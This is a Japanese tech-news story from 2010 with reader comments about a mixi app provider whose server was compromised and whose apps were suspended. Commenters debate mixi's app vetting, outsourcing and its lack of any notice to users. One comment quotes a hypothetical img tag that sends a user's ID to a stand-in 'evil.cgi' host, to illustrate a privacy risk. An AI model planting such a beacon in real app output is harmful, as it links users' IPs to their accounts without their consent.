パスワードを忘れた? アカウント作成
Close
197839 story
セキュリティ

mixiアプリを提供していたサーバーが改竄被害、サービス停止に 21

ストーリー by hylom
mixiだからしょうがない 部門より

あるAnonymous Coward 曰く、

「マイミク通信簿」や「今日の名言」など、mixiをやっている人なら結構な頻度で目にするであろうmixiアプリを提供していた「空飛ぶ」(現在は改竄の影響からかHP不通状態)が、サーバーを改竄されたとしてアプリケーションの提供を停止する事態が起きている。

mixiにとってmixiアプリはmixiの利益予想の下方修正に繋がるほどのインパクトがあったようだが、問題は色々とありそうだ。

タレコミ人としては、こういった危険な状態をなぜmixiが気がつけなかったのか、管理体制に疑問を感じずには居られない。

ちなみにこの「空飛ぶ」、以前もmixiのユーザートップページに制限なしに任意のHTMLコードを書けるというアレなmixiアプリ「フリーエリア」を公開して一部で話題になっていた(なお、こちらはすぐに「mixiアプリの規約に違反している」として公開中止になっている)。

この議論は賞味期限が切れたので、アーカイブ化されています。 新たにコメントを付けることはできません。

mixiアプリを提供していたサーバーが改竄被害、サービス停止に More

  • 一次ソースというか (スコア:4, 参考になる)

    by Anonymous Coward on 2010年03月02日 13時04分 (#1726088)

    タレコミよりこっちのほうが詳しい
    ♯というかmixiに通報した人っぽい

    『mixiアプリ』という脆弱性 - Yoshino Inamoriの日記 [srad.jp]

  • 全部別の話? (スコア:2, すばらしい洞察)

    by Anonymous Coward on 2010年03月02日 12時30分 (#1726047)

    mixiやってねーから、よくわからんのだけど、

    ・特定のアプリを開発している会社の問題
    ・インフラに金がかかりすぎたmixiアプリの問題
    ・mixiアプリの審査体制の問題

    全部いっぺんに書いてる?

    • Re:全部別の話? (スコア:1)

      by greentea (17971) on 2010年03月02日 14時25分 (#1726177) 日記

      一番の問題は、安全に「外のもの」を中に入れたり「中のもの」を外に出すことの難しさをmixi側が認識していなかったことでしょう。

      これまでは、mixiがクラックされない限り、mixi内にさえいれば、安全であったのですが、
      外の世界を取り込んだり、外の世界に中のデータを渡してしまえば、その前提が成り立たなくなるのです。

      えらくいい加減な仮定ですが、全てのサービスが、クラックされない可能性がともに等しくa(1)とすると、
      mixiだけであれば、クラックされる確率は1-aなのですが、n-1個の外部サービスを加えると、クラックされる確率は1-a^nに増えてしまうのです。

      # mixiアプリが始まった当初、自分のmixi日記に、アプリが<img src="http://www.example.com/evil.cgi?id=${USER_ID}">と出力したらIPとmixiIDを紐付けされる、と書いてた。
      # もうされてるのかなぁ?

      --
      1を聞いて0を知れ!
      シェア
      親コメント

    • Re: (スコア:0)

      by Anonymous Coward

      だな。更に言うなら

      ・アプリをアウトソーシングしてもウマーとなるとは限らない

      ってのはでかいかと。
      ここしばらくなんでもかんでもアウトソーシングでOKみたいな流れがあるので
      きちんと適材適所でやるようになれば良いやね。

    • Re: (スコア:0)

      by Anonymous Coward
      >>mixiやってねーから、よくわからんのだけど、

      mixiもtwitterもやってないし、自分のwebページも持っていない俺様はやっぱり幸せだな

  • 疑問ねぇ…… (スコア:2, すばらしい洞察)

    by sakamoto (8009) on 2010年03月02日 12時56分 (#1726080) 日記

    「タレコミ人としては、こういった危険な状態をなぜmixiが気がつけなかったのか、管理体制に疑問を感じずには居られない 」

    ???? アカウント作れば平文でパスワードがメールで送られてくるし、 https のページからわざわざ login しても http に飛ぶようなサイトの管理体制に想像が付かないなんて、 タレコミ人の方に疑問を感じるのだが? 部門名通りというのが業界標準なのでは?

    --
    -- 哀れな日本人専用(sorry Japanese only) --

    • Re:疑問ねぇ…… (スコア:2, おもしろおかしい)

      by Anonymous Coward on 2010年03月02日 13時01分 (#1726086)

      perlで作った程度のことを自慢気に語っちゃうようなところですからね。

      シェア
      親コメント

      • Re: (スコア:0)

        by Anonymous Coward

        上場企業ならPHPを使うべきところらしいですからね。

    • Re:疑問ねぇ…… (スコア:2, 興味深い)

      by Sakura Avalon (12557) on 2010年03月02日 21時18分 (#1726489)
      気づいててもほっかむりですしね。今に至ってもmixi公式なアナウンスはまったくありません。運営者としてのmixiからの注意やらアプリ停止のお知らせすらありません。(アプリそのものを使おうとすると「制限されている」とは出るらしいです。私自身はこの会社のアプリを一つも登録してなかったので確認できていません。)
      ITmedia News記事がmixiニュースに掲載されたのも、ようやく昨日になってからでした。毎日更新されてるので、土日休んでましたとかでもなさそうです。おかげでこの記事で日記を書いてる人さえごく少数です。アプリ登録者の割りにあまりに少ないのは、たぶんほとんど気づかれてないためでしょう。

      原因などは調査中だそうですがサーバーは既に改竄済みなわけで、もしかすると「プロでもなかなか見つけられない」Wormが仕掛けられている可能性だってあります。それがGENOウィルスみたいな代物で、改竄後に一度でもアプリを使ったユーザーのPCには侵入していて何かの拍子に一気に…という事だって無いとは言えません。イタチごっことはいえ、原因不明だろうがなんだろうがユーザーに対して「念のためウィルスチェックしてください」と呼びかける事さえやらないのはそれこそトヨタじゃありませんが隠蔽と言われたって仕方ないと思います。

      #完全ではないにしても、まず不安感の払拭って大切だと思う。
      #アプリ使えない!→サーバー改竄だってよ!→うちのマシン本当に大丈夫?→mixi沈黙→ねぇ大丈夫なの?→mixi沈黙…
      #おーい、出て来ーい→mixi沈黙→mixi「大丈夫でした。ご安心を。」→怒り爆発!!
      シェア
      親コメント

      • Re: (スコア:0)

        by Anonymous Coward

        > #おーい、出て来ーい→mixi沈黙
        →石を投げ込んでみる、かと思った。

  • デベロッパー(サードバーティ)のクオリティが低すぎると思います。
    どこかが儲けたら一斉にパクり始める。
    バグ満載、ブラウザによって動かない、重過ぎる、サーバー落ちる…。

    でもアイテム課金だけはきっちり設計してるw

    海外じゃFacebookで大儲けしてる例があるから、怪しいベンチャーが押し寄せてるんじゃないでしょうか。
    個人的には、早く大手ゲームメーカーに参入して貰いたいと思います。

  • 言ってしまえば (スコア:0)

    by Anonymous Coward on 2010年03月02日 12時31分 (#1726049)
    気づくようなところは狙わんのですよ
typodupeerror

普通のやつらの下を行け -- バッドノウハウ専門家